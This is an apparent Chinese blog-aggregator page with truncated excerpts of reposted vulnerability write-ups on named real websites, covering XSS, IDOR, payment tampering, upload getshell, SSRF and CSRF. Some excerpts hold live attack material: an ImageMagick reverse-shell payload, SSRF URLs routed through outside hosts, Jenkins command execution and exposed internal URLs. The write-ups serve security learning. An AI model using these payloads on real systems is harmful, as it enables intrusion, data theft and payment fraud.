E-COM-NET
首页
在线工具
Layui镜像站
SUI文档
联系我们
推荐频道
Java
PHP
C++
C
C#
Python
Ruby
go语言
Scala
Servlet
Vue
MySQL
NoSQL
Redis
CSS
Oracle
SQL Server
DB2
HBase
Http
HTML5
Spring
Ajax
Jquery
JavaScript
Json
XML
NodeJs
mybatis
Hibernate
算法
设计模式
shell
数据结构
大数据
JS
消息中间件
正则表达式
Tomcat
SQL
Nginx
Shiro
Maven
Linux
漏洞学习
【
漏洞学习
——XSS】Protonmail的存储型XSS漏洞
大家好,这篇文章我将分享在Protonmail的Web端发现两个严重漏洞。漏洞1:暴力破解我在注册了邮箱服务,测试了一些IDOR攻击,虽然没发现什么漏洞,但我在HTTP请求中发现了用来重置密码的10数字码!因此,我可以通过暴力破解来非法重置用户密码。漏洞2:存储型XSS我还在Protonmail电子邮件编写页面中发现了一个存储型XSS,并且只要向其他用户发送构造好的邮件就可以发动XSS攻击。攻击步
FLy_鹏程万里
·
2019-03-07 09:19
【渗透测试实战1】
【
漏洞学习
——XSS】Edmodo网站的XSS漏洞
各位漏洞猎人好!在这篇文章中,我将告诉你我是如何在Edmodo(一个教育互动平台)发现XSS的。这个漏洞是我一个月前发现的。ParthShah写的一篇关于存储型XSS的文章启发了我。在我浏览edmodo.com网站时,发现了以前从未见过的URL,页面只有一个登录页面和一个简单且过时的布局。嗯,看样子可能存在漏洞。所以,让我们开始吧!那个页面的URL如下:目标URL:https://www.edmo
FLy_鹏程万里
·
2019-03-07 09:19
【渗透测试实战1】
【
漏洞学习
——越权】佑一良品某站多处平行越权漏洞
漏洞细节佑一良品(www.uiyi.cn)主站多处平行越权漏洞,主要有以下几个功能:1,收货地址删除功能;2,收货地址修改查看功能;3,订单取消功能;4,意见反馈删除功能。以上几个功能都存在平行越权漏洞,大概请求分别如下:1)订单取消功能:POST/Cancel/NewCancelOrderHTTP/1.1Host:my.uiyi.cnOrderNo=160414754582)收货地址修改查看功能
FLy_鹏程万里
·
2019-02-22 19:11
【渗透测试实战1】
【
漏洞学习
——越权】Mtime时光网越权查看订单
漏洞细节时光网app下载地址http://feature.mtime.com/mobile/测试的是ios客户端有两处接口可越权遍历订单#1GET/ECommerce/GoodsOrderInfo.api?goodsOrderId=7708428HTTP/1.1Host:api.m.mtime.cnX-MTime-Mobile-CheckValue:5,1462780658496,80CB2F43
FLy_鹏程万里
·
2019-02-22 19:04
【渗透测试实战1】
【
漏洞学习
——越权】Mtime时光网越权查看订单
漏洞细节时光网app下载地址http://feature.mtime.com/mobile/测试的是ios客户端有两处接口可越权遍历订单#1GET/ECommerce/GoodsOrderInfo.api?goodsOrderId=7708428HTTP/1.1Host:api.m.mtime.cnX-MTime-Mobile-CheckValue:5,1462780658496,80CB2F43
FLy_鹏程万里
·
2019-02-22 19:04
【渗透测试实战1】
【
漏洞学习
——越权】华住酒店某处越权删除修改用户信息
漏洞细节商城收货地址越权修改与删除,遍历地址id就可越权操作,目前是3万多地址https://hmall.huazhu.com/member_addressList.html修改:POST/api/shop/memberAddress!edit.do?addr_id=37860HTTP/1.1Host:hmall.huazhu.comConnection:keep-aliveContent-Len
FLy_鹏程万里
·
2019-02-22 19:47
【渗透测试实战1】
【
漏洞学习
——越权】华住酒店某处越权删除修改用户信息
漏洞细节商城收货地址越权修改与删除,遍历地址id就可越权操作,目前是3万多地址https://hmall.huazhu.com/member_addressList.html修改:POST/api/shop/memberAddress!edit.do?addr_id=37860HTTP/1.1Host:hmall.huazhu.comConnection:keep-aliveContent-Len
FLy_鹏程万里
·
2019-02-22 19:47
【渗透测试实战1】
【
漏洞学习
——敏感信息泄露】国药集团福建某系统多处敏感信息泄露
漏洞细节多处敏感信息泄露国药福建OA系统:http://218.5.65.215:8080/yyoa/session泄露:http://218.5.65.215:8080/yyoa/ext/https/getSessionList.jsp?cmd=getAllsession劫持登陆:http://218.5.65.215:8080/yyoa/assess/js/initDataAssess.jsp
FLy_鹏程万里
·
2019-02-22 19:13
【渗透测试实战1】
【
漏洞学习
——未授权访问】慧聪网Jenkins系统未授权访问
漏洞细节http://58.252.73.136:8007/(慧聪网询盘宝反馈活动)http://58.252.73.136:8001/login.aspx(慧聪家电城CRM系统)http://58.252.73.136:8080(jenkins管理后台,免密码访问)http://58.252.73.136:8080/script下执行cmd命令println"ipconfig".execute(
FLy_鹏程万里
·
2019-02-22 19:42
【渗透测试实战1】
【
漏洞学习
——任意文件上传】航天神洁某系统存在任意文件上传漏洞
漏洞细节航天神洁(北京)环保科技有限公司是由中国航天系统科学与工程研究院、中国航天空气动力技术研究院、航天投资控股股份有限公司和中景恒基集团共同投资组建。http://**.**.**.**/index.asp漏洞地址:http://**.**.**.**/upload_flash.asp通过上传jpg图片,抓包改包为asp后缀上传成功后查看页面源代码可以得到上传路径,直接就是网站根目录一句话:h
FLy_鹏程万里
·
2019-02-22 19:00
【渗透测试实战1】
【
漏洞学习
——任意文件上传】四川外国语大学某分站任意文件上传导致getshell
漏洞细节fck编辑器存在地址:http://**.**.**.**:8080/include/fckeditor/editor/filemanager/upload/test.html上传文件时可在文件名后加空格进行绕过上传getshell修复建议:增加白名单检测绕过参见:https://bugs.shuimugan.com/bug/view?bug_no=154062
FLy_鹏程万里
·
2019-02-22 19:53
【渗透测试实战1】
【
漏洞学习
——任意文件上传】LAMP兄弟连旗下猿代码存在任意上传文件漏洞
漏洞细节输入网址:http://www.ydma.cn/1、随意注册一个账号2、购买任意免费课程3、进入该课程的讨论区4、点击发表话题,点击上传图片。复制返回地址到浏览器打开。例如:http://www.ydma.cn/files/image/2015/11-18/765506617564c41053996b.phpor:http://www.ydma.cn/files/image/2015/11
FLy_鹏程万里
·
2019-02-22 19:32
【渗透测试实战1】
【
漏洞学习
——支付漏洞】阿姨帮最新版APP支付漏洞+地址/订单遍历/删除
漏洞细节1、超低价格支付订单点击首页,随便选择一项服务并下订单点击确认支付抓包并先截断提交:POSThttps://api-cust.ayibang.com/v1/pay/wx/signHTTP/1.1User-Agent:{"os":"4.4.2","unique":"28552821044111528D2446FF003","version-Code":1012,"version-Name":
FLy_鹏程万里
·
2019-02-22 19:21
【渗透测试实战1】
【
漏洞学习
——支付漏洞】酷我音乐会员0.01元购买成功存在支付逻辑漏洞
漏洞细节1、找到酷我会员购买界面,使用微信支付方式2、正常情况下需要通过扫描微信的支付验证码,支付10元购买一个月会员3、0元购买时通过修改数据包的付费金额为0.01元,然后扫描微信支付成功后就可以成功成为会员了修改为0.01元继续操作支付请求变为0.01元了扫一下支付成功后重新登录查看参见:https://bugs.shuimugan.com/bug/view?bug_no=174799
FLy_鹏程万里
·
2019-02-22 19:12
【渗透测试实战1】
【
漏洞学习
——命令执行】开心网多处命令执行
漏洞细节漏洞URL1:http://www.kaixin001.com/set/logo.php在修改头像处,上传正常图片的时候抓包,把下面这个payload直接添加上去就可以直接反弹shellpushgraphic-contextviewbox00640480imagecopy200,200100,100"|bash-i>&/dev/tcp/【ip】/23330>&1"popgraphic-co
FLy_鹏程万里
·
2019-02-22 19:12
【渗透测试实战1】
【
漏洞学习
——SSRF】知乎主站一处SSRF漏洞可探测内网
回答这个问题的时候发现的:https://www.zhihu.com/question/38548957/answer/77482000还真是有点意思,正好用实际漏洞回答了题主的问题,内网安全真的不重要么?通过这个漏洞,我就可以探测并进入企业的内网,如果内网中应用存在漏洞,将导致黑客进入内网漏洞细节知乎回答问题的时候,输入网址将自动被转换为标题。比如输入http://wooyun.org/,将会变
FLy_鹏程万里
·
2019-02-22 17:17
【渗透测试实战1】
【
漏洞学习
——SSRF】七牛某站SSRF可探测内网
一、SSRF漏洞有漏洞的貌似是一个测试站:http://demos.qiniu.com/demo/qimage/index.html存在SSRF漏洞接口的作用是先获取远程的图片,然后把图片制作成水印覆盖在当前图片上,用百度的logo做演示,效果如下:http://rwxf.qiniudn.com/1234.jpg?watermark/1/image/aHR0cHM6Ly93d3cuYmFpZHUu
FLy_鹏程万里
·
2019-02-22 17:09
【渗透测试实战1】
【
漏洞学习
——SSRF】bilibili某分站从信息泄露到ssrf再到命令执行
漏洞细节这个只是memcache的案例,如果是redis更好利用了0x00前言扫描器时常会扫描到一些信息泄露,如discuz的配置文件/config/config_global.php~里面时常带有数据库密码等,但又苦于内网,十分尴尬。0x01个例分析以bilibili这个为例http://bbs.biligame.com/config/config_global.php~测试返回如下图万事俱备了
FLy_鹏程万里
·
2019-02-22 17:00
【渗透测试实战1】
【
漏洞学习
——SSRF】腾讯某处SSRF漏洞(非常好的利用点)附利用脚本
漏洞细节##1.描述本文章将概述一些经典的SSRF漏洞利用原理,从Fuzz扫描开放的服务到漏洞的自动化利用,刚好腾讯的这个漏洞点,非常适合做为案例来演示。###1.1漏洞信息>腾讯微博应用>http://share.v.t.qq.com>SSRF利用点,参数:url>http://share.v.t.qq.com/index.php?c=share&a=pageinfo&url=http://wu
FLy_鹏程万里
·
2019-02-22 17:55
【渗透测试实战1】
【
漏洞学习
——SSRF】小米某处SSRF漏洞(可内网SHELL 附多线程Fuzz脚本)
漏洞细节#1存在漏洞位置,Discuz论坛SSRF漏洞http://www.miui.com/forum.php?mod=ajax&action=downremoteimg&message=[img]http://fuzz.wuyun.com/302.php?data=helo.jpg[/img]#2服务器支持dict、ftp、http协议http://www.miui.com/forum.php
FLy_鹏程万里
·
2019-02-22 17:49
【渗透测试实战1】
【
漏洞学习
——SSRF】优酷多个分站存在SSRF漏洞大礼包
漏洞细节http://bbs.yj.youku.com/forum.php?mod=ajax&action=downremoteimg&message=[img]http://tv.phpinfo.me/exp.php?s=ftp%26ip={ip}%26port={port}%26data=helo.jpg[/img]http://club.youku.com//forum.php?mod=aj
FLy_鹏程万里
·
2019-02-22 17:25
【渗透测试实战1】
【
漏洞学习
——SSRF】人人网几处站点存在SSRF漏洞
漏洞学习
使用ssrf可进行内网渗透,利用跳转可进行其他协议探测是一个不错的姿势http://war.gamebbs.renren.com/forum.php?
FLy_鹏程万里
·
2019-02-22 17:19
【渗透测试实战1】
【
漏洞学习
——SSRF】360某处ssrf漏洞可探测内网信息
漏洞细节利用302绕过http协议限制#!/usr/bin/envpython#-*-coding:utf-8-*-#@Author:Lcy#@Date:2016-07-0520:55:30#@LastModifiedby:LcyimportrequestsimportthreadingimportQueueimportrandomimporttimeurl="http://st.so.com/s
FLy_鹏程万里
·
2019-02-22 17:13
【渗透测试实战1】
【
漏洞学习
——CSRF】bilibili某处csrf漏洞
漏洞细节此漏洞可以针对up主,关闭下列三项弹幕权限,使其发稿视频没有弹幕!csrf位置在用户中心-->过滤管理中http://member.bilibili.com/#gl_managepocCSRF/exploit--bilibilidocument.forms[0].submit();修复方案(1)加上token(2)验证reffer
FLy_鹏程万里
·
2019-02-22 17:00
【渗透测试实战1】
【
漏洞学习
——CSRF】淘宝网CSRF添加收货地址
漏洞细节漏洞URL:http://member1.taobao.com/member/fresh/deliver_address.htm收获地址细节:表单信息内容使用burpsuite生成CSRF请求包,之后再浏览器当中进行访问修复方案1、检查Reference2、添加CSRF-Token校验参见:https://bugs.shuimugan.com/bug/view?bug_no=164471
FLy_鹏程万里
·
2019-02-22 17:06
【渗透测试实战1】
【
漏洞学习
——XSS】phpmps 存储XSS漏洞
漏洞细节首先提交一个请求,在orderid处填写payload之后后台访问,支付记录,触发XSS参见:https://bugs.shuimugan.com/bug/view?bug_no=106608
FLy_鹏程万里
·
2019-02-22 17:05
【渗透测试实战1】
【
漏洞学习
——XSS】Destoon B2B网站管理系统存储xss
漏洞简介DestoonB2B网站管理系统存储xss,可打后台cookie我们在修改资料的地方插入xss查看源代码--发现没有做任何的过滤alert(/xss/)"/>我们既闭合value值,又成功地插入了xss后台成功触发因此我们继续,插入盗取cookie的xss代码/>我们登录到后台查看,我们的xss平台已经收到管理的cookie了哈哈参见:https://bugs.shuimugan.com/
FLy_鹏程万里
·
2019-02-22 17:30
【渗透测试实战1】
反序列化
漏洞学习
序列化就是把一个对象转成字符串的形式,可以保存起来反序列化就是把已经转成字符串的对象,再还原变成原对象一个实例定义了一个baby对象,再定义一个$file变量。中间的自定义函数先不管,我们先给$file一个变量值flag.php,通过serialize函数将这个对象变为字符串。就是0开头绿色那条。解释下这个字符串0:4:"baby"0对象4d对象名长度s字符串4变量名长度"file"变量名后面就是
Emily0917
·
2018-12-23 22:54
web 通用型
漏洞学习
web通用型
漏洞学习
变量覆盖原理:把自定义的参数值替换为变量的参数值,从而覆盖了变量值,产生漏洞。
Emily0917
·
2018-12-23 22:48
每一个工程师都要学的安全测试,老板再也不用担心服务器被黑
同时我建立了一个简易的攻击模型用于XSS
漏洞学习
。1.漏洞术语了解一些简单术语就好。VULVulnerability漏洞,指能对系统造成损坏或能借之攻击系统的Bug
腾讯云加社区
·
2018-12-18 00:00
测试
服务器
程序员
黑客
网络安全
SSRF
漏洞学习
什么是SSRF?简介:SSRF(Server-SideRequestForgery)服务端请求伪造,是一种由攻击者构造形成由服务器端发起请求的一个漏洞,一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。SSRF危害即可以实现的攻击行为主机本地敏感信息读取,对外网、服务器所在内网、本地进行端口扫描,获取一些服务的Banner信息攻击运行在内外网主机的应用程序通过访问默认文件对内网Web应用进
鸡翅儿
·
2018-12-11 15:31
【WEB学习】常见WEB
漏洞学习
01-SQL注入漏洞SQL注入的产生,SQL注入是由WEB页面端向数据库端提交查询请求,但因提交查询请求时,代码过滤不严谨,在WEB网站进行查询时,可以插入恶意的SQL代码,注入到数据库,产生恶意的查询,所以产生了SQL注入漏洞。科普:SQL注入漏洞的分类1.数字型在Web端大概是http://xxx.com/news.php?id=1这种形式,其注入点id类型为数字,所以叫数字型注入点。这一类的
Naughty学长
·
2018-09-18 15:55
ms07-029
漏洞学习
漏洞描述ms07-029是一个远程执行代码漏洞,成功利用此漏洞的×××者可以远程完全控制受影响的系统。×××者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。漏洞编号CVE-2007-1748BID-23470×××目标及端口DNS服务器端口:需要自行确定影响系统MicrosoftWindows2000ServerServicePack4MicrosoftWindowsSe
Owefsad
·
2018-09-13 17:57
ms17-029
漏洞复现
Vuls
Emersion
总结-各种安全
漏洞学习
环境集合
在平时工作生活以及学习中,遇到了各种安全漏洞实验环境。本着方便自己方便他人的思想,我简单的将其收集一些。可能不全面,后续还会继续补充,希望能帮助初学安全的人,能为其提供一个好的动手环境。1.upload-labs:一个包含各种上传漏洞的实验环境。2.natas:一个闯关类安全游戏3.DVWA:OWASP十大漏洞实验环境4.vulhub:一个专门的漏洞实验环境,包含各种复杂漏洞情景。5.强盗战争:h
晴天安好2997
·
2018-09-02 14:37
IT
CSRF
漏洞学习
CORS处理跨域的一些小心得经常在工作中遇到一些跨域的问题,最近用angularJS写一个后台系统,就遇到了一些跨域的问题,在这里分享下顺便记录下.部分内容引用的阮哥哥的文章,仅仅是为了方便学习浏览器将CORS请求分成两类:简单请求(simplerequest)和非简单请求(not-so-simplerequest)。只要同时满足以下两大条件,就属于简单请求。(1)请求方法是以下三种方法之一:HE
Wh0ale
·
2018-08-11 16:47
cors
csr
安全技术
工具使用
redis未授权访问
漏洞学习
注释了默认的#bind127.0.0.1使其变成0.0.0.0:6379使其暴露在公网,而且protected-modeno禁用了保护模式。而且没有设置防火墙规则,使未授权IP可以访问。2.没有设置密码认证。3.而且redis还得以root权限运行,否则会无法写入参考http://www.alloyteam.com/2017/07/12910/http://www.freebuf.com/vuls
caiqiiqi
·
2018-07-31 17:48
网络编程
XXE
漏洞学习
0x00什么是XML1.定义XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。2.文档结构XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。]]]>DaveTomReminderYouareagoodman3.DTDXML文档结构包括X
时光不改
·
2018-06-06 23:00
samba
漏洞学习
一、Samba是linux和unix系统上实现smb协议的一个免费软件,由客户机和服务器构成。SMB是一种在局域网上实现共享文件和打印机的协议。存在一个服务器,客户机通过该协议可以服务器上的共享文件系统和打印机以及其他的资源。通过设置,还可以和全世界的电脑分享资源二、Usermap_script漏洞存在版本samba3.0.20-3.0.25rc3攻击者可以通过用户名包含shell元字符,执行任意
去你的哈哈怪
·
2018-06-01 11:51
loophole
struts2-052
漏洞学习
一、1.strust2Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互2.strust2-052漏洞Struts2REST插件的XStream组件存在反序列化漏洞,使用XStream组件对XML格式的数据包进行反序列化操作时,未对数据内容进行有效验证,存在安全隐患
去你的哈哈怪
·
2018-02-13 21:10
loophole
Windows 内核
漏洞学习
—空指针解引用
原标题:WindowsKernelExploitation–NullPointerDereference原文地址:https://osandamalith.com/2017...由prison翻译整理,首发i春秋引言:Windows内核漏洞的利用和学习一直是众多白帽子心中的痛,相对于web安全来说内核学习方面的文章实在太少,今天为大家带来的是Windows内核内核安全学习较为基础的文章,步骤完善,
anquan
·
2017-08-11 00:00
漏洞
安全测试学习准备工作
有计划慢慢熟悉安全测试相关的内容,了解OWASP的一些知识,今天做了如下尝试:1、选择
漏洞学习
的网站,用WebGoat,步骤非常简单确认本地已经安装了JAVA运行环境,java-version;下载WebGoat
ericzhangyuncsdn
·
2017-05-08 16:58
Life
APP安全
漏洞学习
笔记
APP安全
漏洞学习
笔记本文首先明确了APP安全的目标,然后对常见的APP漏洞进行了整理分析,并研究学习了APK的静态分析与动态分析技术,最后介绍了安卓的渗透测试技术和常见的安全评估工具。
Caaacy_YU
·
2016-12-28 21:16
Android安全
struts2
漏洞学习
总结
struts2安全漏洞Struts2是apache项目下的一个web框架,普遍应用于阿里巴巴、京东等互联网、政府、企业门户网站。目录1背景2内容3造成的影响:4应对措施:背景Struts2是apache项目下的一个web框架,普遍应用于阿里巴巴、京东等互联网、政府、企业门户网站。内容在2013年6月底发布的Struts2.3.15版本被曝出存在重要的安全漏洞[1],主要问题如下:可远程执行服务器脚
bcbobo21cn
·
2016-06-24 10:37
转载
Java
安全编程
Windows系统
漏洞学习
总结
Windows系统常见漏洞分析由于windowsNT/2000操作系统的普及率和市场占有率比较高,所以很容易使它成为很多黑客攻击的目标。目前,WindowsNT/2000最主要的漏洞有Unicode漏洞、.ida/.idq缓冲区溢出漏洞、MicrosoftIISCGI文件名错误解码漏洞、MSADCSRDS弱点漏洞、FrontPage服务器扩展和.Printer漏洞等等。下面笔者将对这些漏洞的原理、
bcbobo21cn
·
2016-04-01 19:31
转载
安全编程
Windows系统
漏洞学习
总结
Windows系统常见漏洞分析由于windowsNT/2000操作系统的普及率和市场占有率比较高,所以很容易使它成为很多黑客攻击的目标。目前,WindowsNT/2000最主要的漏洞有Unicode漏洞、.ida/.idq缓冲区溢出漏洞、MicrosoftIISCGI文件名错误解码漏洞、MSADCSRDS弱点漏洞、FrontPage服务器扩展和.Printer漏洞等等。下面笔者将对这些漏洞的原理、
bcbobo21cn
·
2016-04-01 19:00
windows
windows
黑客攻击
系统漏洞
系统漏洞
[置顶] 基于长密码的PHP函数验证
漏洞学习
(Long Password Denial of Service (DoS))
啥都不说,干货直接上源码。itoa64='./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'; if($iteration_count_log231) $iteration_count_log2=8; $this->iteration_count_log2=$iteration_count_log2; $this->
bjtbjt
·
2015-11-18 16:00
漏洞
源码
PHP
函数
Hacking Team Flash 0day
漏洞学习
笔记
原文链接:http://www.cnblogs.com/crazyDogge/p/4718047.html周日的夜晚,与囧桑下载下来HackingTeam之前爆出的flash0day漏洞,怀着紧张激动的心情,在自己的机子上做了实验,经测试,在我的虚拟机(一个sp3的XP,貌似没装Flash)上根本跑不出Flash漏洞,在我的Win10宿主机上跑,貌似刚升级的Flash,洞被补上了,也不能用。最后在
diezhi8827
·
2015-08-10 15:00
齐博CMS的sql注入
漏洞学习
今天看到了asrc上面对某个cms的漏洞分析的文章(http://security.alibaba.com/blog/blog.htm?spm=0.0.0.0.96tpib&id=13),感觉阿里大牛在写漏洞分析的时候还是有点谨慎,利用方式什么就更不能说了。百度搜了一下这个CMS,使用量还是不小的。对php不太懂,简单学习了一下,并且总结了利用方式。漏洞的原因就是inc/common.inc.ph
dingodingy
·
2015-03-26 18:26
安全
php
sql注入
齐博CMS的sql注入
漏洞学习
阅读更多今天看到了asrc上面对某个cms的漏洞分析的文章(http://security.alibaba.com/blog/blog.htm?spm=0.0.0.0.96tpib&id=13),感觉阿里大牛在写漏洞分析的时候还是有点谨慎,利用方式什么就更不能说了。百度搜了一下这个CMS,使用量还是不小的。对php不太懂,简单学习了一下,并且总结了利用方式。漏洞的原因就是inc/common.in
dingody
·
2015-03-26 18:00
php
齐博cms
sql注入
漏洞
齐博CMS的sql注入
漏洞学习
阅读更多今天看到了asrc上面对某个cms的漏洞分析的文章(http://security.alibaba.com/blog/blog.htm?spm=0.0.0.0.96tpib&id=13),感觉阿里大牛在写漏洞分析的时候还是有点谨慎,利用方式什么就更不能说了。百度搜了一下这个CMS,使用量还是不小的。对php不太懂,简单学习了一下,并且总结了利用方式。漏洞的原因就是inc/common.in
dingody
·
2015-03-26 18:00
php
齐博cms
sql注入
漏洞
上一页
1
2
3
4
5
6
下一页
按字母分类:
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
其他